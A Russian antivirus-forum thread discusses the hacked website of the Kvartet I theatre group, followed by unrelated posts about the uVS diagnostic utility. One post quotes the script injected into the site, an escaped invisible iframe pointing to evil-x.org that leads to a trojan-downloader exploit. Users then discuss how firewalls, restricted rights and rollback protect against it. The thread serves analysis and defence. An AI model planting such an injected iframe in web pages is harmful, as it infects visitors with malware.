Перейти к содержанию
Иван

КвартетИ

Recommended Posts

Иван

Сайт товарищей из КвартетаИ (День Радио, День Выборов и проч) похоже того...

особо меня радует текст на головной странице того сайта, который KIS отлавливает

________.JPG

post-10-1182791149.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber

Угу.

На этом сайте размещен iframe:

<body><!-- o4 --><script type="text/javascript">alert('u003cu0069u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0022u0068 u0074u0074u0070u003au002fu002fu0065u0076u0069u006cu002du0078u002eu006fu0072u0067u002fu0058u0044 u0053u002fu0069u0066u0072u0061u006du0065u002eu0070u0068u0070u0022u0020u0077u0069u0064u0074u0068 u003du0030u0020u0068u0065u0069u0067u0068u0074u003du0030u0020u0062u006fu0072u0064u0065u0072u003d u0030u003eu003cu002fu0069u0066u0072u0061u006du0065u003e')</script><!-- c4 --><!--htm-->

Равносильно -

evil-x.org/XDS/iframe.php, откуда evil-x.org/spk2/index.php - тут расположен сам эксплоит, который и детектируется веб-антивирусом как Trojan-Downloader.JS.Agent.ja

Он в свою очередь в случае эксплуатации уязвимости загружает и запускает трояна. Я его чуть позже выложу в закрытой ветке форума.

Троян недетектируется ни семеркай Каспера (значит не эмулем, ни сигнатурно), ни беткай доктора.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

ну хорошо хоть сам эксплоит ловится

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Inkogn
.

Может ли какой модуль проактивки или их дальнейшие составляющие или фиревал помешать трояну?Я имею ввиду не базовые настройки,а все.Помешать эксплоиту,если бы файловый был бы отключён?

Ограничение прав всем дальнейшим является ли препятствием для срабатывания этого эксплоита и дальше загрузки и срабатывания трояна с успешным осуществлением всего того,для чего он написан?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Может ли какой модуль проактивки или их дальнейшие составляющие или фиревал помешать трояну?Я имею ввиду не базовые настройки,а все.Помешать эксплоиту,если бы файловый был бы отключён?

Ограничение прав всем дальнейшим является ли препятствием для срабатывания этого эксплоита и дальше загрузки и срабатывания трояна с успешным осуществлением всего того,для чего он написан?

В данном случае - это троян-загрузчик. Он в системе не укрепляется, значит, проактивка ему не мешает (хотя сейчас достаточно распространены трояны-загрузчики криптованные, они при запуске запускают копию своего собственного процесса, и в эту копию внедряют образ троянца - это может детектироваться проактивными системами как внедрение в другой процесс(invader)). В данном случае должен помочь фаервол.

Эксплоит в данном случае словил не ФА, а веб-антивирус - то есть до момента исполнения в браузере.

Ограничение прав не должно помешать срабатыванию эксплоита, но позволит минимизировать нанесенный вред. Если это загрузчик без инсталляции - то и юзерских прав хватит. А вот то, что он скачивает не сможет укрепиться в системе.

Отключение выполнения скриптов в браузере и запуск его с юзерскими правами - надежная защита :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

а файловый тоже срабатывает, даже если веб-антивирус отключен

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dr.Golova

Дык для этого и нужна эшолонированная защита.

В данном случае зараза ловится уже на уровне сетевых пакетов.

Если бы не поймалась, то троянский поток заработал бы внутри доверенного процесса (эксплорер или svchost), и прекрасно жил бы внутри системы до первого палевного действия - типа дропнуть трояна или ск0чать известную малвару с инета с записью в авторан (отослать всю приватную инфу с машины он мог бы безоговорочно), а до этого его не поймает ниодин антивирус, ровно как и HIPS (привет Рабиновичу ;-)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Inkogn

Там просто делаешь "откат" и все,кроме отдельно разрешённых,изменения на компе стираются.Не только темпорари инетфилес,а все.После инета рекомендуется.В моём случае,фиря не инсталирована (собираюсь),инвадеры разрешены (из-за вечных,уже обговоренных,глюков).Если бы данный зловред был бы новым,не в сигнатурах,то только откат бы после инета всё бы и подчистил.Даже регистри.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Михаил Кондрашин

Их хакнули?

Сейчас там ничего нет!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

хакнули

ну так понятно, что нет

я послал проблемку в ЛК, те пообещали сообщить хозяевам сайта и проконсультитровать их по возникшей проблеме

видать сообщили

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • demkd
      ---------------------------------------------------------
       4.15.4
      ---------------------------------------------------------
       o Обновлен интерфейс.

       o Из Ф портировано окно "История запуска процессов" для комфортного распутывания цепочек запуска и взаимодействия
         процессов с задачами.
         Доступ к окну можно получить через меню "Дополнительно->История процессов и задач".
         В первом списке отображается история запуска процессов с момента старта системы (по данным журнала Windows).
         В списке доступен фильтрующий поиск по имени, PID и фильтрация по родительскому процессу (см. контекстное меню).
         В нижнем списке отображается история воздействия процессов на задачи с момента запуска системы, а если установлен
         фильтр родительского процесса то отображаются лишь те задачи с которым взаимодействовал родительский процесс.
         (!) История доступна лишь при активном отслеживании процессов и задач (Твик #39).
         (!) История не доступна для неактивных систем.

       o Обновлен формат образа автозапуска, образы созданные v4.15.4 не будут читаться старыми версиями uVS.
         Добавлено:
          o Мгновенный срез активности процессов на момент завершения создания образа (Запустить->Просмотр активности процессов [Alt+D])
          o История процессов и задач (Дополнительно->История процессов и задач)
            (!) История доступна лишь при активном отслеживании процессов и задач (Твик #39).
          o Защита образа от повреждений.

       o Утилита cmpimg обновлена до версии 1.04 для поддержки нового формата образов автозапуска.

       o Утилита uvs_snd обновлена до версии 1.05 для поддержки нового формата образов автозапуска.

       o Теперь при подключении к удаленной системе всегда запускается "v" версия uVS, если клиентская система не младше Vista.
         На удаленной системе всегда запускается обычная версия uVS для совместимости с системами младше Vista.

       o Исправлена ошибка отображения имени процесса при работе под Win2k в окне "Активность процессов".
         (!) Английская версия uVS НЕ_совместима с Win2k, с Win2k работает только русская версия.

       o Исправлена ошибка разбора состояния TCPIPv6 соединений.
       
    • demkd
      Если пишет что файлов нет то так оно и есть, по пути в принципе видно, что их там точно быть не может.
      Проблема же в том что при запуске под SYSTEM, API windows не способен правильно разбирать некоторые ярлыки, где не указан абсолютный путь, такие ярлыки меняют цель в зависимости от того под каким пользователем работает конкретный процесс, зачем это сделал microsoft для меня загадка.
      Единственное решение - это написать api для разбора любых ярлыков с нуля и добавить еще нехилую надстройку для анализа относительных путей в них, но это довольно сложная задача и на данный момент реализована лишь в малой части и скорее всего никогда не будет реализована на 100%.
      Потому если хочется удалить ссылки на отсутствующие объекты имеющие ярлыки то нужно запускаться под текущим пользователем, проблем будет меньше... если пользователь один Все системные файлы имеют внешнюю эцп и вполне определенные имена.
    • PR55.RP55
      uVS  в Windows 7 при запуске в режиме: Запустить под LocalSystem ( максимальные права, без доступа к сети ) Не видит пути к реально существующим объектам типа: Полное имя                  C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\DESKTOP\CALIBRE-PORTABLE\CALIBRE PORTABLE\CALIBRE-PORTABLE.EXE
      Имя файла                   CALIBRE-PORTABLE.EXE
      Статус                      ПОДОЗРИТЕЛЬНЫЙ
      Инф. о файле                Системе не удается найти указанный путь.
      Цифр. подпись               проверка не производилась
                                  
      Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
      Путь до файла               Типичен для вирусов и троянов
                                  
      Ссылки на объект            
      SHORTCUT                    C:\USERS\USER\DESKTOP\calibre-portable.exe - Ярлык.lnk
      ---------------------                 Полное имя                  C:\WINDOWS\SYSTEM32\CONFIG\SYSTEMPROFILE\DESKTOP\АРХИВ\UVS 4.1.1 ДРОВА\START.EXE
      Имя файла                   START.EXE
      Статус                      ПОДОЗРИТЕЛЬНЫЙ
      Инф. о файле                Системе не удается найти указанный путь.
      Цифр. подпись               проверка не производилась
                                  
      Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
      Путь до файла               Типичен для вирусов и троянов
                                  
      Ссылки на объект            
      SHORTCUT                    C:\USER\USER\DESKTOP\start.exe - Ярлык.lnk
      --------- Как результат удаление всех этих ярлыков. + Глюки если программа была на панели задач. Пусть uVS пишет в ИНФО. откуда _реально получена подпись.                                 
    • demkd
      подпись userinit в catroot и VT естественно такие подписи проверить никак не сможет.
    • PR55.RP55
      C:\WINDOWS\SYSTEM32\USERINIT.EXE Действительна, подписано Microsoft Windows ------- https://www.virustotal.com/gui/file/0c079dadf24e4078d3505aaab094b710da244ce4faf25f21566488106beaeba0/details Signature verification File is not signed --------- Хотелось бы _сразу видеть в Инфо. результат проверки на V.T.  ( при выборочной проверке - отдельно взятого файла ) Если V.T. такого функционала не предоставляет... То открывать\скачивать страницу ( текст ) и писать результат в Инфо. Образ: https://forum.esetnod32.ru/messages/forum3/topic17900/message117128/#message117128    
×